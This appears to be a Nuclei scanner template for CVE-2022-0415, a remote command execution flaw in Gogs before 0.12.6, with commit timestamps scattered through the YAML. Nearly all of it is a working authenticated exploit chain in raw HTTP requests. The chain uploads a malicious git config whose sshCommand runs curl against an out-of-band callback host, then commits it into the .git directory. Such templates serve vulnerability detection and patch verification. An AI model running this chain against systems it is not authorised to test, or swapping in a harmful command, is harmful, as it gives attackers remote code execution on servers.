2023-03-18 22:07:09 +00:00
id : CVE-2022-0415
info :
2023-03-28 19:27:32 +00:00
name : Gogs <0.12.6 - Remote Command Execution
2023-03-18 22:07:09 +00:00
author : theamanrawat
severity : high
description : |
2023-03-28 20:45:01 +00:00
Gogs before 0.12.6 is susceptible to remote command execution via the uploading repository file in GitHub repository gogs/gogs. An attacker can execute malware, obtain sensitive information, modify data, and/or gain full control over a compromised system without entering necessary credentials.
2023-03-18 22:07:09 +00:00
reference :
- https://github.com/gogs/gogs/commit/0fef3c9082269e9a4e817274942a5d7c50617284
2023-03-20 07:05:15 +00:00
- https://huntr.dev/bounties/b4928cfe-4110-462f-a180-6d5673797902
2023-03-28 19:27:32 +00:00
- https://nvd.nist.gov/vuln/detail/CVE-2022-0415
remediation : Fixed in version 0.12.6.
2023-03-18 22:07:09 +00:00
classification :
cvss-metrics : CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
cvss-score : 8.8
cve-id : CVE-2022-0415
2023-07-11 19:49:27 +00:00
cwe-id : CWE-434,CWE-20
epss-score : 0.27369
2023-04-12 10:55:48 +00:00
cpe : cpe:2.3:a:gogs:gogs:*:*:*:*:*:*:*:*
2023-03-18 22:07:09 +00:00
metadata :
2023-04-28 08:11:21 +00:00
max-request : 6
2023-06-04 08:13:42 +00:00
verified : true
2023-07-11 19:49:27 +00:00
vendor : gogs
product : gogs
tags : rce,gogs,authenticated,huntr,cve,cve2022,intrusive
2023-03-18 22:07:09 +00:00
2023-04-27 04:28:59 +00:00
http :
2023-03-18 22:07:09 +00:00
- raw :
- |
GET /user/login HTTP/1.1
Host : {{Hostname}}
- |
POST /user/login HTTP/1.1
Host : {{Hostname}}
Content-Type : application/x-www-form-urlencoded
_csrf={{csrf}}&user_name={{username}}&password={{url_encode(password)}}
- |
GET /repo/create HTTP/1.1
Host : {{Hostname}}
- |
POST /repo/create HTTP/1.1
Host : {{Hostname}}
Content-Type : application/x-www-form-urlencoded
_csrf={{auth_csrf}}&user_id=1&repo_name={{randstr}}&description=test&gitignores=&license=&readme=Default&auto_init=on
- |
POST /{{username}}/{{randstr}}/upload-file HTTP/1.1
Host : {{Hostname}}
Accept : application/json
X-Requested-With : XMLHttpRequest
X-Csrf-Token : {{auth_csrf}}
Content-Type : multipart/form-data; boundary=---------------------------313811965223810628771946318395
-----------------------------313811965223810628771946318395
Content-Disposition : form-data; name="file"; filename="config"
Content-Type : application/octet-stream
[ core]
repositoryformatversion = 0
filemode = true
bare = false
logallrefupdates = true
ignorecase = true
precomposeunicode = true
sshCommand = curl http://{{interactsh-url}} -I
[ remote "origin"]
url = git@github.com:torvalds/linux.git
fetch = +refs/heads/*:refs/remotes/origin/*
[ branch "master"]
remote = origin
merge = refs/heads/master
-----------------------------313811965223810628771946318395 --
- |
POST /{{username}}/{{randstr}}/_upload/master/ HTTP/1.1
Host : {{Hostname}}
Content-Type : application/x-www-form-urlencoded
_csrf={{auth_csrf}}&tree_path=/.git/&files={{uuid}}&commit_summary=&commit_message=&commit_choice=direct&new_branch_name=
cookie-reuse : true
2023-07-11 19:49:27 +00:00
2023-03-18 22:07:09 +00:00
matchers-condition : and
matchers :
- type : word
part : interactsh_protocol
words :
2023-07-11 19:49:27 +00:00
- dns
- http
2023-03-18 22:07:09 +00:00
- type : word
part : body_1
words :
2023-07-11 19:49:27 +00:00
- content="Gogs
2023-03-18 22:07:09 +00:00
extractors :
- type : regex
name : csrf
group : 1
regex :
2023-07-11 19:49:27 +00:00
- name="_csrf" value="(.*)"
2023-03-18 22:07:09 +00:00
internal : true
- type : regex
name : auth_csrf
group : 1
regex :
2023-07-11 19:49:27 +00:00
- name="_csrf" content="(.*)"
2023-03-18 22:07:09 +00:00
internal : true
- type : regex
name : uuid
group : 1
regex :
- ' "uuid": "(.*)"'
internal : true